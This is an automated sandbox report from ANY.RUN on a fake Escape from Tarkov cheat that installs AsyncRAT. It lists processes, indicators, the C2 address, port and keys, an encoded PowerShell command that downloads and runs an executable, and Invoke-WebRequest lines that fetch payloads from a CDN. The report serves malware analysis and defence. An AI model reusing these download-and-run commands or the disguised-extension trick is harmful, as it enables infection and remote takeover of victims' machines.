URL:

https://github.com/supoyev/Escape-from-Tarkov-External-Esp-Aimbot-Cheat/raw/main/escape%20from%20tarkov/Escape%20From%20Tarkov/Escape%20From%20Tarkov%E2%80%AEnls..scr

Full analysis: https://app.any.run/tasks/a9b605da-033e-4a0b-a15d-2414b79b049e
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Malware Trends Tracker     >>>
Analysis date: November 14, 2023, 12:27:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
rat
asyncrat
remote
Indicators:
SHA1:

3065DA0D35988807C34C98164D35385F846AB1DF

SHA256:

84C8AD42D82A82951A1968C738FC813A83FC5CD6F1C2F446F2960CF21A373E14

SSDEEP:

3:N8tEdmQVyyvZWYKTsIHTmNIKiAX5KIAqyTZ3OKGgyTZ3OKMzXAkD:2uwAV0QJSO5yV+KGgyV+KMzXAa

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • Escape From Tarkov_nls..scr (PID: 3552)
      • 6eYwGvYfZ8.exe (PID: 3780)
      • powershell.exe (PID: 2504)
      • RegAsm.exe (PID: 2756)

    • Create files in the Startup directory

      • 6eYwGvYfZ8.exe (PID: 3780)

    • ASYNCRAT has been detected (SURICATA)

      • RegAsm.exe (PID: 2756)

    • ASYNCRAT has been detected (YARA)

      • RegAsm.exe (PID: 2756)

  • SUSPICIOUS

    • Reads settings of System Certificates

      • Escape From Tarkov_nls..scr (PID: 3552)
      • RegAsm.exe (PID: 2756)

    • Uses RUNDLL32.EXE to load library

      • cmd.exe (PID: 3648)

    • Reads the Internet Settings

      • Escape From Tarkov_nls..scr (PID: 3552)
      • xU2bRls9x8.exe (PID: 3852)
      • gGGpmHMqVl.exe (PID: 4004)
      • AmZxIPbzHv.exe (PID: 1172)
      • powershell.exe (PID: 3820)
      • rundll32.exe (PID: 3708)
      • powershell.exe (PID: 3912)
      • powershell.exe (PID: 4088)
      • powershell.exe (PID: 2504)
      • RegAsm.exe (PID: 2756)
      • powershell.exe (PID: 3052)
      • powershell.exe (PID: 2996)
      • hF3nP5CjhI.exe (PID: 3756)
      • powershell.exe (PID: 2504)
      • powershell.exe (PID: 2524)
      • powershell.exe (PID: 3144)
      • powershell.exe (PID: 4092)
      • cmd.exe (PID: 3016)
      • powershell.exe (PID: 3376)

    • Starts CMD.EXE for commands execution

      • Escape From Tarkov_nls..scr (PID: 3552)
      • icannotseeyou.exe (PID: 2572)

    • BASE64 encoded PowerShell command has been detected

      • hF3nP5CjhI.exe (PID: 3756)
      • xU2bRls9x8.exe (PID: 3852)
      • gGGpmHMqVl.exe (PID: 4004)
      • AmZxIPbzHv.exe (PID: 1172)

    • Base64-obfuscated command line is found

      • xU2bRls9x8.exe (PID: 3852)
      • gGGpmHMqVl.exe (PID: 4004)
      • AmZxIPbzHv.exe (PID: 1172)
      • hF3nP5CjhI.exe (PID: 3756)

    • Starts POWERSHELL.EXE for commands execution

      • xU2bRls9x8.exe (PID: 3852)
      • gGGpmHMqVl.exe (PID: 4004)
      • AmZxIPbzHv.exe (PID: 1172)
      • cmd.exe (PID: 3016)
      • hF3nP5CjhI.exe (PID: 3756)

    • Unusual connection from system programs

      • powershell.exe (PID: 3820)
      • powershell.exe (PID: 3912)
      • powershell.exe (PID: 4088)
      • powershell.exe (PID: 2504)
      • powershell.exe (PID: 3052)
      • powershell.exe (PID: 2996)
      • powershell.exe (PID: 4092)
      • powershell.exe (PID: 2524)
      • powershell.exe (PID: 2504)
      • powershell.exe (PID: 3376)
      • powershell.exe (PID: 3144)

    • The Powershell connects to the Internet

      • powershell.exe (PID: 3820)
      • powershell.exe (PID: 3912)
      • powershell.exe (PID: 4088)
      • powershell.exe (PID: 2504)
      • powershell.exe (PID: 3052)
      • powershell.exe (PID: 2996)
      • powershell.exe (PID: 2524)
      • powershell.exe (PID: 4092)
      • powershell.exe (PID: 2504)
      • powershell.exe (PID: 3376)
      • powershell.exe (PID: 3144)

    • Process drops legitimate windows executable

      • powershell.exe (PID: 2504)
      • RegAsm.exe (PID: 2756)

    • Connects to unusual port

      • RegAsm.exe (PID: 2756)

    • Executing commands from a ".bat" file

      • icannotseeyou.exe (PID: 2572)

    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 3016)

    • The process executes via Task Scheduler

      • 4KSDFSFGQ.exe (PID: 684)

  • INFO

    • Application launched itself

      • firefox.exe (PID: 2944)

    • Drops the executable file immediately after the start

      • firefox.exe (PID: 2944)

    • Checks supported languages

      • Escape From Tarkov_nls..scr (PID: 3552)
      • hF3nP5CjhI.exe (PID: 3756)
      • xU2bRls9x8.exe (PID: 3852)
      • gGGpmHMqVl.exe (PID: 4004)
      • AmZxIPbzHv.exe (PID: 1172)
      • 6eYwGvYfZ8.exe (PID: 3780)
      • 4KSDFSFGQ.exe (PID: 4064)
      • RegAsm.exe (PID: 2756)
      • icannotseeyou.exe (PID: 2572)
      • RunNihaiersion.exe (PID: 4196)
      • RegAsm.exe (PID: 4932)
      • 4KSDFSFGQ.exe (PID: 684)
      • RunNihaiersion.exe (PID: 4720)

    • Checks proxy server information

      • Escape From Tarkov_nls..scr (PID: 3552)

    • The process uses the downloaded file

      • firefox.exe (PID: 2944)

    • Manual execution by a user

      • Escape From Tarkov_nls..scr (PID: 3552)
      • RunNihaiersion.exe (PID: 4196)
      • WinRAR.exe (PID: 4444)
      • RunNihaiersion.exe (PID: 4720)

    • Reads the computer name

      • Escape From Tarkov_nls..scr (PID: 3552)
      • hF3nP5CjhI.exe (PID: 3756)
      • xU2bRls9x8.exe (PID: 3852)
      • gGGpmHMqVl.exe (PID: 4004)
      • AmZxIPbzHv.exe (PID: 1172)
      • 6eYwGvYfZ8.exe (PID: 3780)
      • 4KSDFSFGQ.exe (PID: 4064)
      • RegAsm.exe (PID: 2756)
      • RunNihaiersion.exe (PID: 4196)
      • RegAsm.exe (PID: 4932)
      • 4KSDFSFGQ.exe (PID: 684)
      • RunNihaiersion.exe (PID: 4720)

    • Reads the machine GUID from the registry

      • Escape From Tarkov_nls..scr (PID: 3552)
      • 6eYwGvYfZ8.exe (PID: 3780)
      • 4KSDFSFGQ.exe (PID: 4064)
      • RegAsm.exe (PID: 2756)
      • 4KSDFSFGQ.exe (PID: 684)
      • RegAsm.exe (PID: 4932)

    • Create files in a temporary directory

      • Escape From Tarkov_nls..scr (PID: 3552)
      • icannotseeyou.exe (PID: 2572)

    • The executable file from the user directory is run by the CMD process

      • hF3nP5CjhI.exe (PID: 3756)
      • xU2bRls9x8.exe (PID: 3852)
      • gGGpmHMqVl.exe (PID: 4004)
      • AmZxIPbzHv.exe (PID: 1172)
      • 6eYwGvYfZ8.exe (PID: 3780)

    • Creates files or folders in the user directory

      • 6eYwGvYfZ8.exe (PID: 3780)

    • The executable file from the user directory is run by the Powershell process

      • 4KSDFSFGQ.exe (PID: 4064)

    • Reads Environment values

      • RegAsm.exe (PID: 2756)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AsyncRat

(PID) Process(2756) RegAsm.exe
C2 (1)46.1.103.69
Ports (1)2341
BotnetWinlogo
Version0.5.7B
Options
AutoRunfalse
MutexWinlogo
InstallFolder%AppData%
BSoDfalse
AntiVMfalse
Certificates
Cert1MIIE4jCCAsqgAwIBAgIQAJmupDKFEn4QYTi6VNAu5zANBgkqhkiG9w0BAQ0FADASMRAwDgYDVQQDDAd3YXJyaW9yMCAXDTIyMDEzMDE3MzkzNFoYDzk5OTkxMjMxMjM1OTU5WjASMRAwDgYDVQQDDAd3YXJyaW9yMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA1p1heFXbFVfmtOd5Qw+jVCq6buTiUXzCHJ9ogNwGpJyyNyN70miKC4VIi30fCZ1IXcc8rAM4ODRzPV6HEPOKw29lKaG6kXtr...
Server_Signature1ajtzfKxv1bwZEWK+9/HzCaSbNCfVE2x/bTP4vIFbI5fkIokcrrfEgOz57WgPIqZu+p/xwZAo6kJIh7+joKkrs/Mj7FsXRESnl1r83jc06O8+uBPN8aAMcYMT2IzcR6JekZtLme+336FSMVS3nLUul6xSCKhxOo8sUi0x8wJRZ+udvzOQKwcF4/2jz7/COPC5RzIhuKCW5WqiTpR0zglAGH9sE87rtSoZWHlYCj+M1l3Em53LZPuGVDOqvhVDeCQi6AL8LjowJVgfs2GuzZOHPj8hVSF4wJib6LyONOypzsp...
Keys
AESb8c6ad1d88734e9607849167a2f5bd77596d05413bf63827b3c868f613b91326
Saltbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
98
Monitored processes
47
Malicious processes
9
Suspicious processes
3

Behavior graph

Click at the process to see the details
start firefox.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs escape from tarkov_nls..scr cmd.exe no specs rundll32.exe no specs cmd.exe no specs hf3np5cjhi.exe no specs cmd.exe no specs powershell.exe xu2brls9x8.exe no specs powershell.exe cmd.exe no specs gggpmhmqvl.exe no specs powershell.exe cmd.exe no specs amzxipbzhv.exe no specs powershell.exe cmd.exe no specs cmd.exe no specs 6eywgvyfz8.exe cmd.exe no specs iexplore.exe iexplore.exe 4ksdfsfgq.exe no specs #ASYNCRAT regasm.exe icannotseeyou.exe no specs cmd.exe no specs powershell.exe powershell.exe powershell.exe powershell.exe powershell.exe powershell.exe timeout.exe no specs powershell.exe 4ksdfsfgq.exe no specs winrar.exe no specs regasm.exe no specs runnihaiersion.exe no specs runnihaiersion.exe

Process information

PID
CMD
Path
Indicators
Parent process
684C:\Users\admin\AppData\Roaming\4KSDFSFGQ.exe C:\Users\admin\AppData\Roaming\4KSDFSFGQ.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
glmf32
Exit code:
0
Version:
10.0.19041.0
Modules
Images
c:\users\admin\appdata\roaming\4ksdfsfgq.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\mscoree.dll
908"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2944.6.1166307407\2065239908" -childID 5 -isForBrowser -prefsHandle 3948 -prefMapHandle 3764 -prefsLen 30252 -prefMapSize 244187 -jsInitHandle 928 -jsInitLen 240908 -parentBuildID 20230710165010 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3fd5f542-095a-4fdc-90f6-3ffbe320a778} 2944 "\\.\pipe\gecko-crash-server-pipe.2944" 4124 23505058 tabC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Exit code:
0
Version:
115.0.2
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msasn1.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
1012"cmd" /C C:\Users\admin\AppData\Local\Temp\AmZxIPbzHv.exeC:\Windows\System32\cmd.exeEscape From Tarkov_nls..scr
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1036"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2944.5.303903625\353000642" -childID 4 -isForBrowser -prefsHandle 3872 -prefMapHandle 3876 -prefsLen 30252 -prefMapSize 244187 -jsInitHandle 928 -jsInitLen 240908 -parentBuildID 20230710165010 -appDir "C:\Program Files\Mozilla Firefox\browser" - {274876f7-344b-4cbf-abb7-90962b41481b} 2944 "\\.\pipe\gecko-crash-server-pipe.2944" 3860 2045e358 tabC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Exit code:
0
Version:
115.0.2
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msasn1.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
1172C:\Users\admin\AppData\Local\Temp\AmZxIPbzHv.exeC:\Users\admin\AppData\Local\Temp\AmZxIPbzHv.execmd.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Exit code:
0
Version:
0.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\amzxipbzhv.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
1728"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2944.1.1054295105\12232237" -parentBuildID 20230710165010 -prefsHandle 1400 -prefMapHandle 1396 -prefsLen 29857 -prefMapSize 244187 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fad5e577-7212-4de1-a941-da67fce30ed0} 2944 "\\.\pipe\gecko-crash-server-pipe.2944" 1412 f8d3b58 socketC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Exit code:
0
Version:
115.0.2
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msasn1.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
2284"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2944.2.1678943253\2110894171" -childID 1 -isForBrowser -prefsHandle 2060 -prefMapHandle 2056 -prefsLen 25524 -prefMapSize 244187 -jsInitHandle 928 -jsInitLen 240908 -parentBuildID 20230710165010 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c68e68d1-9327-45a1-948d-537b872c7d41} 2944 "\\.\pipe\gecko-crash-server-pipe.2944" 2072 1954db58 tabC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Exit code:
0
Version:
115.0.2
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msasn1.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
2504"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA2ADAAOQA0ADcAOQAzADIANAAwADIAMgA4ADAAMQAwAC8AMQAxADYANgAwADkANAA5ADAAMAA5ADIANAA3ADgANAA2ADUAMAAvAGUAbABlAGMAaQBpAHAAaQBjAGwALgBlAHgAZQAnACwAIAA8ACMAYQBuAHUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB4AGYAYgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBoAHUAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA0AEsAUwBEAEYAUwBGAEcAUQAuAGUAeABlACcAKQApADwAIwBwAHkAagAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AG4AdgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcwBuAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANABLAFMARABGAFMARgBHAFEALgBlAHgAZQAnACkAPAAjAGQAbAB3ACMAPgA="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
AmZxIPbzHv.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2504Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2524Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
34 072
Read events
33 767
Write events
304
Delete events
1

Modification events

(PID) Process:(2944) firefox.exeKey:HKEY_CURRENT_USER\Software\Mozilla\Firefox\Launcher
Operation:writeName:C:\Program Files\Mozilla Firefox\firefox.exe|Browser
Value:
0000000000000000
(PID) Process:(2944) firefox.exeKey:HKEY_CURRENT_USER\Software\Mozilla\Firefox\Launcher
Operation:writeName:C:\Program Files\Mozilla Firefox\firefox.exe|Telemetry
Value:
1
(PID) Process:(2944) firefox.exeKey:HKEY_CURRENT_USER\Software\Mozilla\Firefox\DllPrefetchExperiment
Operation:writeName:C:\Program Files\Mozilla Firefox\firefox.exe
Value:
0
(PID) Process:(2944) firefox.exeKey:HKEY_CURRENT_USER\Software\Mozilla\Firefox\PreXULSkeletonUISettings
Operation:writeName:C:\Program Files\Mozilla Firefox\firefox.exe|Theme
Value:
1
(PID) Process:(2944) firefox.exeKey:HKEY_CURRENT_USER\Software\Mozilla\Firefox\PreXULSkeletonUISettings
Operation:writeName:C:\Program Files\Mozilla Firefox\firefox.exe|Enabled
Value:
1
(PID) Process:(2944) firefox.exeKey:HKEY_CURRENT_USER\Software\Mozilla\Firefox\Default Browser Agent
Operation:writeName:C:\Program Files\Mozilla Firefox|DisableTelemetry
Value:
0
(PID) Process:(2944) firefox.exeKey:HKEY_CURRENT_USER\Software\Mozilla\Firefox\Default Browser Agent
Operation:writeName:C:\Program Files\Mozilla Firefox|DisableDefaultBrowserAgent
Value:
0
(PID) Process:(2944) firefox.exeKey:HKEY_CURRENT_USER\Software\Mozilla\Firefox\Default Browser Agent
Operation:writeName:C:\Program Files\Mozilla Firefox|SetDefaultBrowserUserChoice
Value:
1
(PID) Process:(2944) firefox.exeKey:HKEY_CURRENT_USER\Software\Mozilla\Firefox\Default Browser Agent
Operation:writeName:C:\Program Files\Mozilla Firefox|AppLastRunTime
Value:
F8B731ACA1C5D901
(PID) Process:(2944) firefox.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
Executable files
17
Suspicious files
563
Text files
1 701
Unknown types
0

Dropped files

PID
Process
Filename
Type
2944firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\nltxvmn2.default\cookies.sqlite-shmbinary
MD5:B7C14EC6110FA820CA6B65F5AEC85911
SHA256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
2944firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\nltxvmn2.default\datareporting\glean\db\data.safe.tmpbinary
MD5:0655A2D1EEF9518AE846BAA4DD9D9FD9
SHA256:BE530199C7CC6CFD9D6463DC4BFD3717A1BA5D878D03771618C070A8620B3B33
2944firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\nltxvmn2.default\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walbinary
MD5:DA10AB6E0FF7BC1A0743D17956EDA777
SHA256:0A73C062173EB31F71E7C6B402D0FFC63F3DDE347CF5C4E1C802ACCEE48ADE2B
2944firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\nltxvmn2.default\datareporting\glean\db\data.safe.binbinary
MD5:0655A2D1EEF9518AE846BAA4DD9D9FD9
SHA256:BE530199C7CC6CFD9D6463DC4BFD3717A1BA5D878D03771618C070A8620B3B33
2944firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\nltxvmn2.default\cache2\entries\6D89348819C8881868053197CA0754F36784BF5Fcompressed
MD5:D8243F42EB619E6158808B64DC3FFBF1
SHA256:B92875C0322AFA660C8CD40013D5FB36C08C541CA155DE232B7BAD1B8A639C7D
2944firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\nltxvmn2.default\datareporting\glean\tmp\c4656ae3-bbf7-484d-98dc-63d9104c56b6text
MD5:174A9B86CFAA43C8DC08E10FCAD10CFF
SHA256:6FFD691D925FC58C0D4D150CB2DA033C28A0E3722D6BF10ED2CCF76CB0425842
2944firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\nltxvmn2.default\cache2\doomed\21991compressed
MD5:58BF90C279D403DC2DFB9B9DF37D9B81
SHA256:4A922FE9DF274368DBD30EC32F033BC5404E868AE1F512F6CFB291D7A4D781C5
2944firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\nltxvmn2.default\sessionCheckpoints.json.tmpbinary
MD5:EA8B62857DFDBD3D0BE7D7E4A954EC9A
SHA256:792955295AE9C382986222C6731C5870BD0E921E7F7E34CC4615F5CD67F225DA
2944firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\nltxvmn2.default\startupCache\urlCache-current.binbinary
MD5:4DF9B77C7650AF87B264E535779AE2A4
SHA256:C57071FCFEF26EE4F08A2029E547848EC015B10045ABAD705195A9F966FEAE58
2944firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\nltxvmn2.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmbinary
MD5:B7C14EC6110FA820CA6B65F5AEC85911
SHA256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
32
TCP/UDP connections
123
DNS requests
161
Threats
17

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2944
firefox.exe
GET
304
2.22.61.59:80
http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip
unknown
2944
firefox.exe
GET
200
34.107.221.82:80
http://detectportal.firefox.com/canonical.html
unknown
text
90 b
2944
firefox.exe
POST
200
192.229.221.95:80
http://ocsp.digicert.com/
unknown
binary
313 b
2944
firefox.exe
POST
200
142.250.185.131:80
http://ocsp.pki.goog/gts1c3
unknown
binary
472 b
2944
firefox.exe
GET
200
34.107.221.82:80
http://detectportal.firefox.com/success.txt?ipv4
unknown
text
8 b
2944
firefox.exe
POST
200
2.16.202.121:80
http://r3.o.lencr.org/
unknown
binary
503 b
2944
firefox.exe
POST
200
2.16.202.121:80
http://r3.o.lencr.org/
unknown
binary
503 b
2944
firefox.exe
POST
200
2.16.202.121:80
http://r3.o.lencr.org/
unknown
binary
503 b
2944
firefox.exe
POST
200
192.229.221.95:80
http://ocsp.digicert.com/
unknown
binary
471 b
2944
firefox.exe
POST
200
2.16.202.121:80
http://r3.o.lencr.org/
unknown
binary
503 b
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
unknown
324
svchost.exe
224.0.0.252:5355
unknown
1956
svchost.exe
239.255.255.250:1900
unknown
4
System
192.168.100.255:137
unknown
2944
firefox.exe
140.82.121.4:443
github.com
GITHUB
US
unknown
2944
firefox.exe
34.107.221.82:80
detectportal.firefox.com
GOOGLE
US
unknown
2944
firefox.exe
34.117.237.239:443
contile.services.mozilla.com
GOOGLE-CLOUD-PLATFORM
US
unknown
2944
firefox.exe
142.250.186.170:443
safebrowsing.googleapis.com
unknown
2944
firefox.exe
18.235.78.81:443
spocs.getpocket.com
AMAZON-AES
US
unknown
2944
firefox.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
unknown

DNS requests

Domain
IP
Reputation
github.com
  • 140.82.121.4
  • 140.82.121.3
unknown
detectportal.firefox.com
  • 34.107.221.82
unknown
prod.detectportal.prod.cloudops.mozgcp.net
  • 34.107.221.82
  • 2600:1901:0:38d7::
unknown
contile.services.mozilla.com
  • 34.117.237.239
unknown
example.org
  • 93.184.216.34
unknown
ipv4only.arpa
  • 192.0.0.170
  • 192.0.0.171
unknown
ocsp.digicert.com
  • 192.229.221.95
unknown
spocs.getpocket.com
  • 18.235.78.81
  • 3.214.21.201
  • 44.209.32.107
  • 34.205.223.217
unknown
proxyserverecs-1736642167.us-east-1.elb.amazonaws.com
  • 18.235.78.81
  • 3.214.21.201
  • 34.205.223.217
  • 44.209.32.107
unknown
fp2e7a.wpc.phicdn.net
  • 192.229.221.95
unknown

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO Pastebin-style Service (textbin .net in TLS SNI)
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discordapp .com)
Misc activity
ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
Potentially Bad Traffic
ET INFO Pastebin-style Service (textbin .net in TLS SNI)
Misc activity
ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
Misc activity
ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
Misc activity
ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
Misc activity
ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
Misc activity
ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
Misc activity
ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
https://github.com/supoyev/Escape-from-Tarkov-External-Esp-Aimbot-Cheat/raw/main/escape%20from%20tarkov/Escape%20From%20Tarkov/Escape%20From%20Tarkov%E2%80%AEnls..scr